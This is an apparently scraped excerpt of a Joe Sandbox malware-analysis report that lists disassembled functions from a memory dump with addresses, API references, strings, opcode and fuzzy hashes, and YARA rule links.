Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64f31fb7232df366b448c796d8a168056792f10e7809125a481ece674d9cb1fa
Instruction ID: 516e688773a674099537b6f9fac24635b9127d846a275261cf89fa4bd20c9b3b
Opcode Fuzzy Hash: 64f31fb7232df366b448c796d8a168056792f10e7809125a481ece674d9cb1fa
Instruction Fuzzy Hash: 0022F622A0C78286EBA0AF25D84037EA7B1FB81794F980131DB9E077D5EF3DD545AB10

Function 00007FF729FF2150 Relevance: 1.8, APIs: 1, Instructions: 524COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8359406427d7441e313c964a91943aba795c173cd14914527a5bdebce8ee8df9
Instruction ID: 0a946df8f82cde74c9ae477ce6089d734d7bd8faf0cc8fd55072fa73e128cb5d
Opcode Fuzzy Hash: 8359406427d7441e313c964a91943aba795c173cd14914527a5bdebce8ee8df9
Instruction Fuzzy Hash: C022D72290CB8242FBB09E2598403BEA7B1FB81754F984131DB9E077D5EF7CD645AB60

Function 00007FF729FF3480 Relevance: 1.8, APIs: 1, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7870c6c021ca0f4964ee2e1045dbf769d6467aae03969b03a72c887785878f
Instruction ID: 285ce63c853f21d53b0cdd754b8450c9ecd72bb12c724e0d4b50ee331806e468
Opcode Fuzzy Hash: 0c7870c6c021ca0f4964ee2e1045dbf769d6467aae03969b03a72c887785878f
Instruction Fuzzy Hash: 7A22C66290CB8642EAB0AE25D84037AA7B1FB807D4F980531DB9E077D4FFBDD545AB10

Function 00007FF729FF1800 Relevance: 1.8, APIs: 1, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de241bdfb19d95c98e180fce152e6234b156d747ac5af4f706f3d6e24815270
Instruction ID: 716481aa7c7ef622cd42cb79375c760c66fe7952b76450bc11646490d02a36ef
Opcode Fuzzy Hash: 5de241bdfb19d95c98e180fce152e6234b156d747ac5af4f706f3d6e24815270
Instruction Fuzzy Hash: F622C622A0C78246EBB09E25984037EA7B1FB81794F980131DB9E077D5EF7DE545EB10

Function 00007FF729FCECA0 Relevance: 1.7, Strings: 1, Instructions: 461COMMON

Download Yara Rule

Strings

cannot create shim for unknown locale::facet, xrefs: 00007FF729FCF503

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: cannot create shim for unknown locale::facet
API String ID: 0-3485955043
Opcode ID: 1ddfef24ab3087e1b4b7d70650a8811df1debb9eb080b5ccd623f5499f82f8b1
Instruction ID: d0a5adafe5f7ed50423885527a1888ac17b5963ed15be3cfe5f148e76470a3c6
Opcode Fuzzy Hash: 1ddfef24ab3087e1b4b7d70650a8811df1debb9eb080b5ccd623f5499f82f8b1
Instruction Fuzzy Hash: 06328D32A09B4286F764AF11E95532EB3A0FB04784F848478C78D07B91EF7DE565DBA0

Function 00007FF729FCE380 Relevance: 1.7, Strings: 1, Instructions: 461COMMON

Download Yara Rule

Strings

cannot create shim for unknown locale::facet, xrefs: 00007FF729FCEBE3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: cannot create shim for unknown locale::facet
API String ID: 0-3485955043
Opcode ID: a17d5c4b09254df20cc8d338a7319a47283f8a61e5b5b224d4df30f5b16bd626
Instruction ID: 3120fd6fa69f0fc59333cc3fa08dd87987fb72e8f541855ae725f1ce96f86200
Opcode Fuzzy Hash: a17d5c4b09254df20cc8d338a7319a47283f8a61e5b5b224d4df30f5b16bd626
Instruction Fuzzy Hash: E7328C32A09B4286F764AF11E95532EB3A0FB04744F848478C78D07B92EF7DF5659BA0

Function 00007FF729FD84C0 Relevance: 1.7, APIs: 1, Instructions: 432stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FD85C7

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 8cfbf49c34c5110f38681f49673be00fca769ce285eaac114a3a8115813c935e
Instruction ID: 4020f0a65396394a32235efebf9aadc9a613cf32434429aae01084cbdd8fbc0e
Opcode Fuzzy Hash: 8cfbf49c34c5110f38681f49673be00fca769ce285eaac114a3a8115813c935e
Instruction Fuzzy Hash: B112932660CA8181EBA19F29D8443BEA7B1FB85F54F484631CE9D037A4DF3DD546EB20

Function 00007FF729FE30B0 Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF729FE32D7

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d577ab840c9062ffb23f4baf21baa87fc2b4f6192749453d7d5203be8b4e1660
Instruction ID: 05f63d29e42ce43cc409d649562abe2dce52b695177e3fc9f164badd69a7092c
Opcode Fuzzy Hash: d577ab840c9062ffb23f4baf21baa87fc2b4f6192749453d7d5203be8b4e1660
Instruction Fuzzy Hash: D0E1C722A0CAC681EBB5AE25D84837DA7B1EB40B94F884631DADD477D4DFBCD540AB10

Function 00007FF729FE1E20 Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF729FE2047

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d577ab840c9062ffb23f4baf21baa87fc2b4f6192749453d7d5203be8b4e1660
Instruction ID: 1e2dd730917b8c63d684d67cfb089d44e4ebef428f47d0b2b7a726d627286af6
Opcode Fuzzy Hash: d577ab840c9062ffb23f4baf21baa87fc2b4f6192749453d7d5203be8b4e1660
Instruction Fuzzy Hash: B3E1A622608BC581EAA59E25D8403ADA771FB80B54F984631DB9E037D5EF7CDA40EB20

Function 00007FF72A0166C0 Relevance: 1.5, APIs: 1, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72A0242D0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72A035B81), ref: 00007FF72A0242FC

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A01684B

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 11b4505d30afcb161b515970764cfc5ebd492caf15349d7c96f9a19307e6fe20
Instruction ID: 3c647d50ceffc2b693bc3f6b8fb262617d914951632c93722e4ead7fe29dc6ad
Opcode Fuzzy Hash: 11b4505d30afcb161b515970764cfc5ebd492caf15349d7c96f9a19307e6fe20
Instruction Fuzzy Hash: A3A15E32608B8685E7609B56E8412EAF3A4FB88BD4F945136EF8C47B59EF3CD145CB10

Function 00007FF729FE3270 Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF729FE32D7

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 918e6c401103f287286bf942c4fd97b2b1cdc35bee4eb5459ba6a3fe3d0ace7e
Instruction ID: 2ca3c31db11e5678ccaf558f2bbfac6ac4e1127066702a04f7b235a58085e1ef
Opcode Fuzzy Hash: 918e6c401103f287286bf942c4fd97b2b1cdc35bee4eb5459ba6a3fe3d0ace7e
Instruction Fuzzy Hash: 5FA1C733A0C6C685EBB1AE259848379A7B1EB80B54F894171CADD037D5DFBCD681DB20

Function 00007FF729FE1FE0 Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF729FE2047

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 918e6c401103f287286bf942c4fd97b2b1cdc35bee4eb5459ba6a3fe3d0ace7e
Instruction ID: 76fa6887f83f2cad871c95774a9949556112d8bb3cc6840f88aee3d1f5928f2b
Opcode Fuzzy Hash: 918e6c401103f287286bf942c4fd97b2b1cdc35bee4eb5459ba6a3fe3d0ace7e
Instruction Fuzzy Hash: C7A1A522A0C7C685FBB59E2598443FAA7B1EB84754F884231CADD037D5EE7CD681DB20

Function 00007FF72A03D12D Relevance: 1.4, APIs: 1, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: eaad10011280b1bac18740d5a1bfdb70de2f40d62e68456ab5f9e36d3465b911
Instruction ID: 04f827818e87df0d349fff43da5201038a3d3148af5e6261d35c2f9d4a7565db
Opcode Fuzzy Hash: eaad10011280b1bac18740d5a1bfdb70de2f40d62e68456ab5f9e36d3465b911
Instruction Fuzzy Hash: 44618622E14B8280FBA0AF25A9403B8A361FB55F98F489675EE4D17799EF38D485C710

Function 00007FF72A03AB9D Relevance: 1.4, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 7696fe63b3c29df3e0a502476300491df6a6a25b2f86035c1ee3520c788a4eb7
Instruction ID: e0b334927afd31c9c2a4139eb1eef3dec618882f6b84c1a9e8d395f2026adfef
Opcode Fuzzy Hash: 7696fe63b3c29df3e0a502476300491df6a6a25b2f86035c1ee3520c788a4eb7
Instruction Fuzzy Hash: 7261C222E14B8281FB61AF2AD9403B8A361EF85F98F488275DE4D17799EF39D485C710

Function 00007FF72A012080 Relevance: .9, Instructions: 888COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cabe6f762308f9f86f48b0eac2f442c256ae416de9fabdb845aabb1d32685b0
Instruction ID: eb79f6e0785a7d9a551583bb1b92875f1323d5b319b37199403040bc6d375533
Opcode Fuzzy Hash: 0cabe6f762308f9f86f48b0eac2f442c256ae416de9fabdb845aabb1d32685b0
Instruction Fuzzy Hash: 79724C36608B8686EB709F25E8402AEF7A1FB88B84F845471DE8D47798EF38D455CB10

Function 00007FF729FFA711 Relevance: .8, Instructions: 806COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 5480ac4271131439cdd0aab4ad5e6fc17a02f4b2b5ba012e26c8982a2dd8465a
Instruction ID: b7c2d9e62a10903ff6998c347cf952eddc1a59327d1eae3152a66e55c1247820
Opcode Fuzzy Hash: 5480ac4271131439cdd0aab4ad5e6fc17a02f4b2b5ba012e26c8982a2dd8465a
Instruction Fuzzy Hash: 8772812260CB8586EBA09F25E84036EB7B1F785B94F984435EA8E077E4EF3CD5449B10

Function 00007FF729FF89DE Relevance: .8, Instructions: 806COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 20c96fa29f15439e6ba7d9a64cef2a1d0c2688e9d969145e9868a6d035a41c8c
Instruction ID: 13361bc8f88df9007d43e760516a02e1112c5e0243142c4d500aa0b86072662c
Opcode Fuzzy Hash: 20c96fa29f15439e6ba7d9a64cef2a1d0c2688e9d969145e9868a6d035a41c8c
Instruction Fuzzy Hash: 9B72602260868186EBA49F25E44036EB7B1FB85B84F984431EF8E477D4EF7DD5849F10

Function 00007FF729FF7B7E Relevance: .8, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
